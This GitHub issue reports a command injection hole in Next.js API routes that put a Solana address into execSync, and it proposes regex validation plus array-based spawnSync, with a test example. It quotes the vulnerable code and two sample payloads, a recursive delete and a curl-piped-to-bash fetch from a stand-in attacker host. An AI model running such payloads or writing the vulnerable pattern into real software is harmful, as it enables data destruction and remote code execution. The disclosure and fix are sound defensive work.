
Critical: Command Injection Vulnerability in API Routes #145

@happybigmtn

Summary

User input is directly interpolated into shell commands in API routes, creating a critical command injection vulnerability.

Affected Files

  • src/app/api/start-round/route.ts (lines 61-72)
  • Other API routes with similar patterns

Problem

```ts
// Dangerous pattern - user input directly in shell command
const result = execSync(`solana account ${accountAddress}`, { encoding: 'utf-8' });
```

An attacker could inject malicious commands via crafted account addresses like:
; rm -rf / # or $(curl attacker.com/shell.sh | bash)

Impact

  • Severity: CRITICAL
  • Remote code execution on server
  • Full system compromise
  • Data theft/destruction

Proposed Fix

  1. Validate input against strict regex pattern for Solana addresses
  2. Use array-based spawn() instead of string-based execSync()
  3. Never interpolate user input into shell commands
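
```ts
// Safe pattern
import { spawnSync } from 'child_process';
import { NextResponse } from 'next/server';

function isValidSolanaAddress(address: string): boolean {
  // Base58 alphabet, 32-44 characters
  return /^[1-9A-HJ-NP-Za-km-z]{32,44}$/.test(address);
}

// Inside the route handler, before any process is started:
if (!isValidSolanaAddress(accountAddress)) {
  return NextResponse.json({ error: 'Invalid address' }, { status: 400 });
}

// Arguments are passed as an array, so no shell ever parses accountAddress
const result = spawnSync('solana', ['account', accountAddress], { encoding: 'utf-8' });
```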
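
The following is an added example, not code from this repository, that exercises the proposed fix and extends it to non-string JSON input. `buildAccountArgv` and `echoArgv` are hypothetical helpers, and the Node executable stands in for the `solana` binary so the block runs offline.

```typescript
import { spawnSync } from 'child_process';

// Same base58 pattern as the proposed fix: 32-44 chars, no 0, O, I or l.
const SOLANA_ADDRESS = /^[1-9A-HJ-NP-Za-km-z]{32,44}$/;

// Type guard: a JSON body can carry arrays or objects, which RegExp.test()
// would silently coerce to a string, so require an actual string first.
function isValidSolanaAddress(address: unknown): address is string {
  return typeof address === 'string' && SOLANA_ADDRESS.test(address);
}

// Hypothetical helper: argv for `solana account <address>`, or null when the
// caller should answer HTTP 400 without starting any process.
function buildAccountArgv(address: unknown): string[] | null {
  return isValidSolanaAddress(address) ? ['account', address] : null;
}

// Stand-in for the solana binary (assumption, so the example runs offline):
// the Node executable prints the argv it received. shell: false means the
// arguments reach the child verbatim and are never parsed by a shell.
function echoArgv(args: string[]): string[] {
  const script = 'console.log(JSON.stringify(process.argv.slice(1)))';
  const r = spawnSync(process.execPath, ['-e', script, '--', ...args], {
    encoding: 'utf-8',
    shell: false,
    timeout: 5000,
  });
  if (r.error || r.status !== 0) {
    throw new Error(`child failed: ${r.error?.message ?? r.stderr}`);
  }
  return JSON.parse(r.stdout);
}

// Constructed sample inputs.
const SYSTEM_PROGRAM = '1'.repeat(32);   // the System Program address
const BENIGN_META = 'x; echo INJECTED';  // harmless metacharacter probe

// Layer 1: validation rejects anything that is not a base58 string.
console.log(buildAccountArgv(SYSTEM_PROGRAM));         // accepted
console.log(buildAccountArgv(BENIGN_META));            // null
console.log(buildAccountArgv([SYSTEM_PROGRAM]));       // null (array, not string)
console.log(buildAccountArgv('-' + SYSTEM_PROGRAM));   // null (would read as a flag)

// Layer 2: even if validation were skipped, array-based spawn keeps the
// metacharacters inside a single literal argument.
console.log(echoArgv(['account', BENIGN_META]));
```

Both layers matter: the regex also rules out a leading `-`, which a shell-free `spawnSync` would otherwise hand to the CLI as an option.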

Labels

bug, critical
